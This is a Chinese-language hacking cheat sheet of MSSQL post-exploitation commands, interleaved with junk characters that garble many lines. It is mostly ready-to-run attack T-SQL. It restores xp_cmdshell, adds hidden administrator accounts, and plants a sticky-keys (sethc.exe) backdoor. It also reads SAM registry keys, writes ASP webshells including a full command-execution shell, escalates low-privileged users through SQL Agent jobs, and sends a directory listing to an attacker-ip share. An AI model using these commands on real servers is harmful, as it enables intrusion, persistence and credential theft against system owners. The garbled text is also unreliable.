1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号! z3 n0 h. I# s5 x
恢复方法:查询分离器连接后,) J: y) Z ~3 I, E
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
9 j6 u3 e; {5 U/ W! l8 c! G( |* E; z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- h9 e" U7 V3 N+ `* b; t8 h0 P2 R8 U2 ?然后按F5键命令执行完毕
3 b3 e4 C$ S0 o6 s
: l8 r; e/ n3 D; c- p2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
: U: f+ l- ^ @' U恢复方法:查询分离器连接后,- r$ u- d, H$ V; f8 x% g" j0 J6 @6 }
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
+ r. c7 x, n2 G9 p7 [" F/ M第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! w6 j+ ]0 G5 U8 K- R# p$ T. R
然后按F5键命令执行完毕
a$ ~" y! c+ x% n( Q& Q' F7 |: p! Z: y0 l5 d# D8 m/ y! r
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): Z4 y4 I8 H: s/ E1 z
恢复方法:查询分离器连接后,
1 g- I) E# o% }" b第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 U4 M4 Q+ k# x8 j3 }6 e X$ d第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' / _. s1 s( H5 ^5 ]* e3 q
然后按F5键命令执行完毕
8 K+ I8 k' m$ U) K% l( m' b- W* ~8 b$ {! Z0 a( ^! }
4 终极方法.
' N1 ?2 s3 M5 G( E5 c/ r+ [如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. d; ^1 y5 j$ o/ D- ]- P8 _* t
查询分离器连接后,. [; L# `: [+ b3 \
2000servser系统:5 i3 S. S9 _' v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
9 A) g0 B3 g3 l% `5 G3 R+ ]& h5 ]% _3 U" q! g6 u- X+ T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'- z9 m4 x1 Y' x" B$ C( s
+ n4 _7 @/ P, F. x5 `7 b( X4 rxp或2003server系统: y( o. e$ j. y! M
* x2 R, P+ I& \. \; h5 e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'- q( ^) p% E0 j% f
" y# d* Q7 O3 g r, R c: Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
: d0 I3 @% F6 }, w$ b) J3 r. f; f' H
$ [+ P7 L0 e. o, c5 g0 C" Z T" C. a, t1 k8 ?" {0 T: l+ [
五个SHIFT
4 ?3 A8 h$ M/ l Fdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
4 L# Z/ y5 L3 M
5 @1 u" q$ `8 a- S9 Hdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
3 z1 o: f3 i' r L5 ^
3 q6 b# a7 _1 J% wxp_cmdshell执行命令另一种方法- |1 T9 J6 T- s; [
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
G& E. A" ?' }" M$ f
0 b5 U/ v6 S0 |0 X6 y; X4 M. h4 S; k判断存储扩展是否存在0 v* ?/ V- E3 }7 ?7 w$ i* i
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
6 d4 P8 y0 L" I/ Z( M返回结果为1就OK! |- f# P2 L0 v; w3 J, } j
! o. X' `2 m2 B( M
! B M9 P( Y# q& N# s8 v9 }
上传xplog70.dll恢复xp_cmdshell语句:
2 s- K: Z- w+ A8 ?& q% Lsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
4 v+ m. x' }# V- n
& @; n ]9 a1 H. h# p0 ^0 `否则上传xplog7.0.dll% G8 P* x& E" G2 Z3 s+ {. {* [
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' r0 s- P, s$ x5 {9 P% l
# C; S1 {9 D9 r( f' ~% N4 B4 X \; V0 O- [7 S6 `" L
, y4 ^& }# E4 W/ e& u- q0 \: R
首先开启沙盘模式:: y0 t6 P. @' C9 Y" O0 `
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ q& @2 G4 u3 l3 n7 y
, z. ^/ |, C2 ?. {; h4 G" p然后利用jet.oledb执行系统命令; F! l! A; D6 M) j: Y9 J
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')3 K+ F- b! u/ o, L! ?/ p
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
8 O3 _5 ^: ?# ^7 @) L; ]& X# {
9 N9 p! @" V# J0 B! o4 p' W. K: c3 j6 N
' i+ m# g! X9 z( s I& L. j
恢复过程sp_addextendedproc 如下:
- B) A5 }3 p3 q1 R' Fcreate procedure sp_addextendedproc --- 1996/08/30 20:13
* @# L0 T& Z' ?" U; K6 r@functname nvarchar(517),/* (owner.)name of function to call */ . B# M# y% J" n4 n* E
@dllname varchar(255)/* name of DLL containing function */ - r5 y" t6 C) X
as * j h7 T+ a. e- ~0 x7 W5 P' w
set implicit_transactions off 8 Y ^* ]7 j, M. \" D: S2 J
if @@trancount > 0 ) X! y# B0 f0 H, J1 |
begin
- Q* Z; E3 u3 F P/ w& N5 Mraiserror(15002,-1,-1,'sp_addextendedproc') ) \* f6 j+ p* e; @1 ]3 M: x
return (1) ; \* O( R$ B( e5 X3 c3 @8 n
end
" l% b( G2 f H. f) tdbcc addextendedproc( @functname, @dllname)
. F+ S. y* U! X% W s! ]1 B. Vreturn (0) -- sp_addextendedproc
* }, l g7 b- Q3 XGO : L0 O$ c& I9 X5 ~( }) l
3 Y- F4 r7 w3 `( C4 y
* g$ ~8 b3 v* l! H2 O9 H" `* N% Q: N
! f! |' `6 k- m. M) s导出管理员密码文件
' Y4 D/ s' @6 J5 i x" ^1 ~sa默认可以读sam键.应该。+ c: S0 F: u2 r- _
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg: Q; A, Z- U. H' O0 N
net user administrator test
3 @; N7 h# W7 D$ A' ^4 d用administrator登陆.
* T9 D% K* {4 C' Z4 q! U用完机器后
; B+ ^0 r" E6 p" @reg import c:\test.reg* G# n: h4 J4 `# F' y
根本不用克隆.
" N1 R( \& f& |) `5 o: C找到对应的sid.
) E4 \; q0 N' n; w- [3 C
Q7 Z. L% ~: N( ?3 y' d9 y
. c2 H: o% |% \" o( e" Y
5 ]# e7 x$ W; T: l1 R8 W) Y. b! n恢复所有存储过程
' e6 S: z' g- a5 [7 E2 V' `use master
+ J; Y; q1 n0 i8 n, K2 Oexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
7 r9 G3 Q' Z) |1 I* d6 c0 k% fexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 4 e1 v v$ I, o, p
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 9 K/ K% A# c7 q+ d2 `+ k0 W
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
, c7 |/ M& i* ^& ~- P( eexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 4 m1 W$ K4 w4 X/ R* c3 i9 N6 T8 z
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
# w5 h4 b: Z; o/ E" z, G8 i0 yexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
& }: g/ v' M; \# N# dexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
! }: ?% O3 c5 T" Aexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 9 s6 X5 g* x4 \( N
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
0 m8 w! H0 b* O ~7 }' y! [( kexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ; j3 j2 Q7 C) B; j
exec sp_addextendedproc sp_OAStop,'odsole70.dll' H) J: H5 b/ J: |: a2 T4 F
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 4 e: w$ R. S2 E+ t
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
/ k4 C1 Q* R) }% I8 ?exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' ( S" Z4 e; Q/ w
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 2 K% @: c* O' m
exec sp_addextendedproc xp_regread,'xpstar.dll' - a9 T O4 U+ Q# n: ~3 m4 x
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 4 C. \% H9 B8 _* w
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
6 f( U. Z" A4 Sexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
8 S2 N7 g. I2 P; ^( i/ L1 j) @
7 Z: ^9 d6 G* R0 Y, V
2 S) I: _5 g) u' }) W9 e& U建立读文件的存储过程
# p9 }1 q# f: \9 S" NCreate proc sp_readTextFile @filename sysname
- m. S; B3 `6 q' C qas
' s' T* U2 G1 e8 a. s; u% Y( p8 ^2 c. c6 `
begin ( ?: S$ h) q/ u9 e0 h
set nocount on - q/ `, q( Y) m4 l/ K" F* z8 g
Create table #tempfile (line varchar(8000))" w8 Y7 O2 S. ?* r1 R' v2 K" S e
exec ('bulk insert #tempfile from "' + @filename + '"')& I1 U& _% I9 |2 W/ x" r: u+ k2 \
select * from #tempfile/ I& w. b6 J9 y- q9 \; V
drop table #tempfile
' E& w: `$ ]; y! s' Q/ EEnd) ] Z* L8 S/ d
! @% ~# k0 v ^9 v) lexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件4 y9 s" h; c) p- _1 Y; r% z6 _
查看登录用户
$ N* z5 ]3 X1 x! Y* d# w' b" wSelect * from sysxlogins# Q8 V7 } w+ K3 Q- V' c
5 z+ H/ q! u0 ]* M% G' Y; z. W把文件内容读取到表中
$ `* C7 W9 m6 e# J K' cBULK INSERT tmp from "c:\test.txt"/ a$ H' p: `6 ^ b) ~; T4 w
dElete from 表名 清理表里的内容) D7 T" ` \! \6 X @' k5 _
create table b_test(fn nvarchar(4000));建一个表,字段为fn
. i3 h+ _& E: o
3 \: G( ?# U5 N* I6 ?! F# C
, O) g. p: {+ C6 L7 ^# l( q: M加sa用户
/ D# ~% I" I3 W) d+ oexec master.dbo.sp_addlogin user,pass;; i2 O# N) ?9 k+ {- p% ]8 c
exec master.dbo.sp_addsrvrolemember user,sysadmin, A& i( ~; ]( R( D) @3 r" ?8 t. h
8 M8 y' J; ?# H8 V8 Q
1 y: P1 s" ?. v; z0 B% Y( V
9 R0 M7 R" J7 M读文件代码
- F) {5 d3 |- ~1 X3 _( gdeclare @o int, @f int, @t int, @ret int
" U8 @1 B9 L5 @declare @line varchar(8000)
# D5 }% w* K8 F1 B% Aexec sp_oacreate 'scripting.filesystemobject', @o out
. r$ N' K Q3 `4 k% s hexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
N+ r9 i9 j$ k1 ]; Y: x9 f* _, V+ Vexec @ret = sp_oamethod @f, 'readline', @line out
: x. A! L$ x& N$ s1 y* iwhile( @ret = 0 )
# w5 c" Q3 i9 H, L7 ?begin
2 K) L' V" j2 Z7 kprint @line7 D9 }3 i' F* [9 @" i Q% @
exec @ret = sp_oamethod @f, 'readline', @line out
3 C. X* Y3 G: i( c2 Jend+ j* o* A+ a* I0 K
% j4 y; j6 V5 y- U: b& k& g1 m$ @& Z3 Z1 H; z; _4 ?# _2 V6 o, l
写文件代码:) |) E/ p3 k! U7 _6 V; b3 [
declare @o int, @f int, @t int, @ret int$ u& k- P3 q8 n% g9 G. Z3 L" }$ h
exec sp_oacreate 'scripting.filesystemobject', @o out7 i) A3 V/ }$ |
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 10 z, u! b4 d, f& C
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
! T; a9 J6 Q2 g$ j9 A" p' i! Z5 K' q
3 J- K; i8 |3 ^$ R5 {$ v! O添加lake2 shell; \2 Q: u; [* e3 O8 O: S
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'1 ~" R+ C) e% r$ Y" e6 ~8 } U* X
sp_dropextendedproc xp_lake2: a+ J3 \! @- Z x; f) D& Z
EXEC xp_lake2 'net user'
6 M* Q6 J9 @7 Q& [4 U& `) W; N: c
7 g; i2 a) `, C% d. f6 B8 k* T( {) Q4 N0 B f
得到硬盘文件信息 8 a6 a# r. Z4 D2 F# k* P7 @4 ?4 \0 c
--参数说明:目录名,目录深度,是否显示文件 1 Z6 a; z1 ]6 z* p7 h7 ^% N4 h
execute master..xp_dirtree 'c:'
4 ?2 R' I" n: F4 o0 l7 ^execute master..xp_dirtree 'c:',1 # I: y. Q K* q3 U7 w3 V
execute master..xp_dirtree 'c:',1,1 & X5 A$ t6 I; C `
1 A* }6 k8 {9 x: p) P$ Z
D# j! b$ _) H$ B读serv-u配置信息
' [- ^' d0 N" D% jexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
7 I* C4 g# L( h0 F. J3 s2 zexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'; q1 Q( |# k* Y
3 w: o9 [ V4 a1 e! L通过xp_regwrite写SHIFT后门. [5 A9 n8 f% C: G# K: w8 _2 l
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
, _+ n- x2 z& K1 R3 J E/ X- x t5 b6 X; a8 X
: q j9 { t P6 D
& z3 O' M& ~8 g+ z! ~: e8 T找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';! w' r2 ]( m6 G3 X9 G6 j8 J$ r
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 @7 @. O" z/ l3 o& y' q
% m2 ^2 {+ D' j9 I: i1 |* tEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
5 }/ N, e z9 h8 @1 b8 U; w& ?" V1 P# ^$ Z0 K7 ?
; A. O$ A X1 S ^3 ?' j2 @
, z# S% X; I+ Z( _0 ?; r- r$ a9 Asql server 2005下开启xp_cmdshell的办法
! `0 D- t( Q% f6 R# H
+ w- L5 O# v3 G0 t0 c$ sEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
1 G" `7 G8 _2 z2 m( f8 H& {- d% ?. r/ K2 p
SQL2005开启'OPENROWSET'支持的方法:
! J7 f6 @5 z/ d+ q# r. ]9 ?8 w' d- q1 s9 U- [0 u! v' X
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
3 M6 a& ]7 G4 U8 @% k/ n
5 y! p$ Q4 S: ? S' I; XSQL2005开启'sp_oacreate'支持的方法:3 z% h; i% n9 E! J( V5 ~) H3 l9 k O
# x; @( m" J1 t1 F( T4 @1 L8 S
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;5 R, \* d9 J k1 F% c, P V! P. i% C
2 F" p; ]& W; t
L( |7 f+ j4 S
; K" y s: p2 Y& P, i, W
( ~! p1 u; b2 k& v$ }- x! f8 n+ y- I9 F4 F+ [- a9 w( F t4 R0 D2 |
* w3 c1 j# Z$ c' F5 L W( A* H5 ]/ Q- _5 o0 d
U) |7 O. j% K m
/ i5 h' o a$ L w& h2 ?, Y" [9 t+ Y8 y& n* l) R
; m% K4 I6 b& ^+ F6 P4 V: A% Y, n6 ]8 h
) s2 L8 s Y9 T9 {+ F- X
4 D, m! ^" d7 g1 s8 T' o
# N# v) q; K. o4 v. I8 Y$ ~4 ?! V9 J0 W, K8 l4 g6 b( h% i
) v6 {' r/ I* y1 c' g O
5 o- N: w; v% W0 v/ d! I
; c) _4 A4 n5 \( X: G0 y& Y5 K1 H j
& {: w( I$ v4 w( c
% W2 x) h% _, S Z7 l U% W& F$ Y6 l/ b8 J' I" ^
: w. Z) x1 G0 l5 y* L
以下方面不知道能不能成功暂且留下研究哈:6 `7 ?/ {7 Y# v5 e
4)
A, G2 p2 v* h( xuse msdb; --这儿不要是master哟/ }" d, H8 p# v1 r
exec sp_add_job @job_name= czy82 ;
3 s/ @7 b: j, V' Sexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
& Q) y, L! Z6 |- ?* ?0 f2 u) Rexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
/ a% Z( k# J; _: t8 z# R }exec sp_start_job @job_name= czy82 ;# u0 n6 ?* ?1 y( r9 }
$ S! _0 \, R9 T
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
1 y1 s8 \/ r$ h) a执行tsql语句了.) U( w2 l4 n3 E2 S; w4 g" ]; H
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名( K: h$ {" H; Q f6 B( Y
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)! ]6 o8 n4 f6 d: O& }( h: Q
net start SQLSERVERAGENT" q$ g4 @5 N" Y
+ B9 e8 H* A% G, }! i
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
7 ^- a0 z7 I, ^9 K4 k6 m; ZUSE msdb
$ ^: i; t; k, @, l( `0 BEXEC sp_add_job @job_name = GetSystemOnSQL ,$ L$ }* N* t' E7 w/ o3 w* U: i
@enabled = 1,
, A( [( O- b- m$ E A- F% }@description = This will give a low privileged user access to" A6 l! R& H+ v% C6 j7 b) U
xp_cmdshell ,
1 W4 S7 l/ J# {6 @0 P! ~$ I# v8 f@delete_level = 1# ^ q# J* T4 O* K. T
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
" `) f, R( o; c5 [@step_name = Exec my sql ,7 D9 t% n4 v6 l7 ?# h1 W4 u9 |
@subsystem = TSQL ,
8 g5 {& B- j! o) Z: w@command = exec master..xp_execresultset N select exec+ S, V7 H# @! I w3 `+ ~7 i2 U
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
0 g0 ]6 q4 }! [9 zEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,: L! C! O% {# T0 d
@server_name = 你的SQL的服务器名 + \3 p# \( c4 d8 b) f+ U
EXEC sp_start_job @job_name = GetSystemOnSQL % `4 G+ k4 i/ K7 r
! P3 x- T" |, A7 W8 @( H不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以7 |: n" B: c3 ^- \. @9 x: l/ M3 v
才让我们可以以public执行xp_cmdshell/ {. j, Q A: [' ^$ Y- u" t
# a: V2 n/ a+ N" I# Y; g1 d- U
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以). h! V+ Z: H; g( Q$ M' ?( Y
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
X6 _- W* l9 W, S6 b) |0 V/ F5 x7 {8 e/ l5 R
USE msdb
/ p& T1 d7 g" T! qEXEC sp_add_job @job_name = ArbitraryFilecreate , C9 o0 c a) p6 B9 s$ E
@enabled = 1,
* M8 s1 \$ c& c4 X u8 P5 x9 ^@description = This will create a file called c:\sqlafc123.txt ,
4 g$ z* m3 @6 E@delete_level = 1
: f$ q$ R# r% q _EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
- n: L: l3 A1 n( ?( e; d5 U4 _@step_name = SQLAFC ,) C$ v! X5 _5 L1 T. h4 x, |9 p
@subsystem = TSQL ,! o1 e3 K, A9 |* {
@command = select hello, this file was created by the SQL Agent. ,
( |; ^ p5 [( F+ H C y4 z9 \@output_file_name = c:\sqlafc123.txt
, `' S$ L6 N" }7 }$ D! IEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
/ N% h/ B& n/ C" w7 p! I( b2 m& W@server_name = SERVER_NAME
# P0 h: r1 j% z: ]3 a; }2 JEXEC sp_start_job @job_name = ArbitraryFilecreate 2 }" [1 A$ M& ?/ Y$ w
- [4 M- t9 j( x) M0 U# K$ k7 S+ v
如果subsystem选的是:tsql,在生成的文件的头部有如下内容# ^0 N4 v# H; Z# n( s
) S& T) l7 [2 D2 A/ \# ?/ s3 \9 @6 [, j??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19& r/ k7 x( J& y0 ^ L% d% P+ v8 R
----------------------------------------------# q( k7 i3 @* f- w! Y- m9 C) W
hello, this file was created by the SQL Agent.; y9 N9 N9 ^: t: U1 a
4 S; y% i/ f' J(1 ?????); M, t8 I# I4 s# c4 R: A4 B
$ x. A$ C$ q* p" e
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员. z6 j7 h( d: f( {7 ^
命令的vbs文件到启动目录!! J3 C4 J7 g1 M& r
5 E; S. F0 N* f* g3 z0 [
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)& C& y; U: V0 m, M- {; k8 ^2 P
关于sp_MScopyscriptfile 看下面的例子
7 @6 | J) H8 }! r1 U* ~declare @command varchar(100)
+ c# d/ }% T6 W( \# _declare @scripfile varchar(200) . q7 N( M( m+ H) s2 x# O
set concat_null_yields_null off 8 z g% U1 P$ L$ h9 x
select @command= dir c:\ > "\\attackerip\share\dir.txt"
}+ Z( ]$ H& m( N8 y e* p9 Vselect @scripfile= c:\autoexec.bat > nul" | @command | rd " , f. g7 u$ I }( F. W
exec sp_MScopyscriptfile @scripfile ,
! ^$ l" ^. O, R9 _2 [4 ^
# {2 |6 ~' q* N这两个东东都还在测试试哟
2 V; i! u$ b6 T$ n# r, z让MSSQL的public用户得到一个本机的web shell 2 y) q, n) q$ d' N) Q
+ `( \3 u% g! p3 @, e
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
( j, K/ D$ [2 x- O5 M--@query= select <img src=vbscript:msgbox(now())>
" s7 F" f/ `1 u--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> ' p: N" K* v# T9 j% V. l
@query= select ( @6 C6 ], ~& R1 O. m) L. f
<%On Error Resume Next / l) S! L. \6 S% w, x! i
Set oscript = Server.createObject("wscript.SHELL")
# ?( I6 R$ s# k USet oscriptNet = Server.createObject("wscript.NETWORK")
+ _0 x; q/ B4 R/ q. ySet oFileSys = Server.createObject("scripting.FileSystemObject") " y; M) G+ \, W3 {3 a
szCMD = Request.Form(".CMD") ' }& y& ?: G; D
If (szCMD <>"")Then
4 n7 e% h) X) ]' oszTempFile = "C:\" & oFileSys.GetTempName() & d0 H! |. f, y' ?* K; b( }0 n6 y
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
5 n O+ w/ E# A; ySet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) / c- f; e0 X6 P5 ?4 n
End If %>
9 l3 o1 u( a+ ?8 F/ H$ B<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
& b& [! h; ]! I/ R. o1 j3 M# {<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 7 a0 I3 R3 V+ n7 }
</FORM>< RE> " a, H2 R# _% P6 ^: n' |* H$ `/ C
<% If (IsObject(oFile))Then 2 \% k4 T! h4 P
On Error Resume Next
- y4 X$ O: h- v3 R1 QResponse.Write Server.HTMLEncode(oFile.ReadAll) " p5 y' H; }8 G- v$ U" }# a
oFile.Close
, ?5 Z9 J( f: { t- i; p. OCall oFileSys.deleteFile(szTempFile, True) 5 S& ]" j& v# ?
End If%>
* \( R( f0 k X+ p: C</BODY></HTML>
1 w+ M4 Q( ^9 y8 m3 }1 f9 R+ r |